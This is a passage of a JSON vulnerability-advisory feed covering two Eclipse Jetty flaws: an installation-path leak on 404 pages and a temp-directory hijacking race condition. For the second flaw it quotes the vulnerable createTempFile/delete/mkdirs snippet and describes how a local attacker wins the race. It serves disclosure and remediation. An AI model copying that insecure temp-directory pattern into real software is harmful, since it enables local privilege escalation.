] }, { "schema_version": "1.7.3", "id": "GHSA-xc67-hjx6-cgg6", "published": "2019-04-23T16:07:12Z", "modified": "2024-03-14T05:20:28.011920Z", "aliases": [ "CVE-2019-10247" ], "summary": "Installation information leak in Eclipse Jetty", "details": "In Eclipse Jetty version 7.x, 8.x, 9.2.27 and older, 9.3.26 and older, and 9.4.16 and older, the server running on any OS and Jetty version combination will reveal the configured fully qualified directory base resource location on the output of the 404 error for not finding a Context that matches the requested path. The default server behavior on jetty-distribution and jetty-home will include at the end of the Handler tree a DefaultHandler, which is responsible for reporting this 404 error, it presents the various configured contexts as HTML for users to click through to. This produced HTML includes output that contains the configured fully qualified directory base resource location for each context.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "9.2.28.v20190418" } ] } ], "versions": [ "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", 
"7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.3.v20140905", 
"9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.27.v20190403", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-xc67-hjx6-cgg6/GHSA-xc67-hjx6-cgg6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.27.v20190418" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.26.v20190403", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-xc67-hjx6-cgg6/GHSA-xc67-hjx6-cgg6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.17.v20190418" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", 
"9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.16.v20190411", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-xc67-hjx6-cgg6/GHSA-xc67-hjx6-cgg6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10247" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4949" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190509-0003" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=546577" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-213" ], "github_reviewed": true, "github_reviewed_at": "2019-04-23T16:04:31Z", "nvd_published_at": "2019-04-22T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g3wg-6mcf-8jj6", "published": "2020-11-04T17:50:24Z", "modified": "2024-03-13T05:33:39.122153Z", "aliases": [ "CVE-2020-27216" ], "related": [ "CVE-2020-27216" ], "summary": "Local Temp Directory Hijacking Vulnerability", "details": "### Impact\nOn Unix like systems, the system's temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race then they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. 
If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability.\n\nAdditionally, any user code uses of [WebAppContext::getTempDirectory](https://www.eclipse.org/jetty/javadoc/9.4.31.v20200723/org/eclipse/jetty/webapp/WebAppContext.html#getTempDirectory()) would similarly be vulnerable.\n\nAdditionally, any user application code using the `ServletContext` attribute for the tempdir will also be impacted.\nSee: https://javaee.github.io/javaee-spec/javadocs/javax/servlet/ServletContext.html#TEMPDIR\n\nFor example:\n```java\nimport java.io.File;\nimport java.io.IOException;\nimport javax.servlet.ServletContext;\nimport javax.servlet.ServletException;\nimport javax.servlet.http.HttpServlet;\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\n\npublic class ExampleServlet extends HttpServlet {\n @Override\n protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {\n File tempDir = (File)getServletContext().getAttribute(ServletContext.TEMPDIR); // Potentially compromised\n // do something with that temp dir\n }\n}\n```\n\nExample: The JSP library itself will use the container temp directory for compiling the JSP source into Java classes before executing them.\n\n### CVSSv3.1 Evaluation\n\nThis vulnerability has been calculated to have a [CVSSv3.1 score of 7.8/10 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\u0026version=3.1)\n\n### Patches\nFixes were applied to the 9.4.x branch with:\n- https://github.com/eclipse/jetty.project/commit/53e0e0e9b25a6309bf24ee3b10984f4145701edb\n- https://github.com/eclipse/jetty.project/commit/9ad6beb80543b392c91653f6bfce233fc75b9d5f\n\nThese will be included in releases: 9.4.33, 10.0.0.beta3, 11.0.0.beta3\n\n### Workarounds\n\nA work around is to set a temporary directory, either for the server or the 
context, to a directory outside of the shared temporary file system.\nFor recent releases, a temporary directory can be created simply by creating a directory called `work` in the ${jetty.base} directory (the parent directory of the `webapps` directory).\nAlternatively, the Java temporary directory can be set with the System Property `java.io.tmpdir`. A more detailed description of how Jetty selects a temporary directory is below.\n\nThe Jetty search order for finding a temporary directory is as follows:\n\n1. If the [`WebAppContext` has a temp directory specified](https://www.eclipse.org/jetty/javadoc/current/org/eclipse/jetty/webapp/WebAppContext.html#setTempDirectory(java.io.File)), use it.\n2. If the `ServletContext` has the `javax.servlet.context.tempdir` attribute set, and if the directory exists, use it.\n3. If a `${jetty.base}/work` directory exists, use it (since Jetty 9.1)\n4. If a `ServletContext` has the `org.eclipse.jetty.webapp.basetempdir` attribute set, and if the directory exists, use it.\n5. Use the value of `System.getProperty(\"java.io.tmpdir\")`.\n\nJetty will end traversal at the first successful step.\nTo mitigate this vulnerability, the directory must be set to one that is not writable by an attacker. 
To avoid information leakage, the directory should also not be readable by an attacker.\n\n#### Setting a Jetty server temporary directory.\n\nChoices 3 and 5 apply to the server level, and will impact all deployed webapps on the server.\n\nFor choice 3 just create that work directory underneath your `${jetty.base}` and restart Jetty.\n\nFor choice 5, just specify your own `java.io.tmpdir` when you start the JVM for Jetty.\n\n``` shell\n[jetty-distribution]$ java -Djava.io.tmpdir=/var/web/work -jar start.jar\n```\n\n#### Setting a Context specific temporary directory.\n\nThe rest of the choices require you to configure the context for that deployed webapp (seen as `${jetty.base}/webapps/\u003ccontext\u003e.xml`)\n\nExample (excluding the DTD which is version specific):\n\n``` xml\n\u003cConfigure class=\"org.eclipse.jetty.webapp.WebAppContext\"\u003e\n \u003cSet name=\"contextPath\"\u003e\u003cProperty name=\"foo\"/\u003e\u003c/Set\u003e\n \u003cSet name=\"war\"\u003e/var/web/webapps/foo.war\u003c/Set\u003e\n \u003cSet name=\"tempDirectory\"\u003e/var/web/work/foo\u003c/Set\u003e\n\u003c/Configure\u003e\n```\n\n### References\n \n - https://github.com/eclipse/jetty.project/issues/5451\n - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)\n - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)\n - [CodeQL Query PR To Detect Similar Vulnerabilities](https://github.com/github/codeql/pull/4473)\n\n### Similar Vulnerabilities\n\nSimilar, but not the same.\n\n - JUnit 4 - https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp\n - Google Guava - https://github.com/google/guava/issues/4011\n - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945\n - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824\n\n### For more information\n\nThe original report of this vulnerability is 
below:\n\n\u003e On Thu, 15 Oct 2020 at 21:14, Jonathan Leitschuh \u003cjonathan.leitschuh@gmail.com\u003e wrote:\n\u003e Hi WebTide Security Team,\n\u003e\n\u003e I'm a security researcher writing some custom CodeQL queries to find Local Temporary Directory Hijacking Vulnerabilities. One of my queries flagged an issue in Jetty.\n\u003e\n\u003e https://lgtm.com/query/5615014766184643449/\n\u003e\n\u003e I've recently been looking into security vulnerabilities involving the temporary directory because on unix-like systems, the system temporary directory is shared between all users.\n\u003e There exists a race condition between the deletion of the temporary file and the creation of the directory.\n\u003e\n\u003e ```java\n\u003e // ensure file will always be unique by appending random digits\n\u003e tmpDir = File.createTempFile(temp, \".dir\", parent); // Attacker knows the full path of the file that will be generated\n\u003e // delete the file that was created\n\u003e tmpDir.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Jetty.\n\u003e // and make a directory of the same name\n\u003e // SECURITY VULNERABILITY: Race Condition! - Attacker beats Jetty and now owns this directory\n\u003e tmpDir.mkdirs();\n\u003e ```\n\u003e\n\u003e https://github.com/eclipse/jetty.project/blob/1b59672b7f668b8a421690154b98b4b2b03f254b/jetty-webapp/src/main/java/org/eclipse/jetty/webapp/WebInfConfiguration.java#L511-L518\n\u003e\n\u003e In several cases the `parent` parameter will not be the system temporary directory. 
However, there is one case where it will be, as the last fallback.\n\u003e\n\u003e\n\u003e https://github.com/eclipse/jetty.project/blob/1b59672b7f668b8a421690154b98b4b2b03f254b/jetty-webapp/src/main/java/org/eclipse/jetty/webapp/WebInfConfiguration.java#L467-L468\n\u003e\n\u003e If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability.\n\u003e\n\u003e Would your team be willing to open a GitHub security advisory to continue the discussion and disclosure there? https://github.com/eclipse/jetty.project/security/advisories\n\u003e\n\u003e **This vulnerability disclosure follows Google's [90-day vulnerability disclosure policy](https://www.google.com/about/appsecurity/) (I'm not an employee of Google, I just like their policy). Full disclosure will occur either at the end of the 90-day deadline or whenever a patch is made widely available, whichever occurs first.**\n\u003e\n\u003e Cheers,\n\u003e Jonathan Leitschuh\n\n\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.33.v20201020" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", 
"7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", 
"9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.4.v20170414", "9.4.4.v20180619", 
"9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } }, { "package": { "name": "org.mortbay.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.33" } ] } ], "versions": [ "7.0.0.pre4", "7.0.0.pre5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0.beta1" }, { "fixed": "10.0.0.beta3" } ] } ], "versions": [ "10.0.0.beta1", "10.0.0.beta2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.0.beta2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } }, { "package": { "name": "org.mortbay.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0.beta1" }, { "fixed": "10.0.0.beta3" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.0.beta2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", 
"events": [ { "introduced": "11.0.0.beta1" }, { "fixed": "11.0.0.beta3" } ] } ], "versions": [ "11.0.0.beta1", "11.0.0.beta2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.0.beta2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } }, { "package": { "name": "org.mortbay.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0.beta1" }, { "fixed": "11.0.0.beta3" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.0.beta2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-g3wg-6mcf-8jj6/GHSA-g3wg-6mcf-8jj6.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6#advisory-comment-63053" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27216" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/5451" }, { "type": "WEB", "url": "https://github.com/github/codeql/pull/4473" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa9c370ab42d737e93bc1795bb6a2187d7c60210cd5e3b3ce8f3c484@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad255c736fad46135f1339408cb0147d0671e45c376c3be85ceeec1a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae15d73cabef55bad148e4e6449b05da95646a2a8db3fc938e858dff@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raf9c581b793c30ff8f55f2415c7bd337eb69775aae607bf9ed1b16fb@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rafb023a7c61180a1027819678eb2068b0b60cd5c2559cb8490e26c81@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb077d35f2940191daeefca0d6449cddb2e9d06bcf8f5af4da2df3ca2@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5f2558ea2ac63633dfb04db1e8a6ea6bb1a2b8614899095e16c6233@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb69b1d7008a4b3de5ce5867e41a455693907026bc70ead06867aa323@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7e159636b26156f6ef2b2a1a79b3ec9a026923b5456713e68f7c18e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb81a018f83fe02c95a2138a7bb4f1e1677bd7e1fc1e7024280c2292d@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8ad3745cb94c60d44cc369aff436eaf03dbc93112cefc86a2ed53ba@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8c007f87dc57731a7b9a3b05364530422535b7e0bc6a0c5b68d4d55@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": 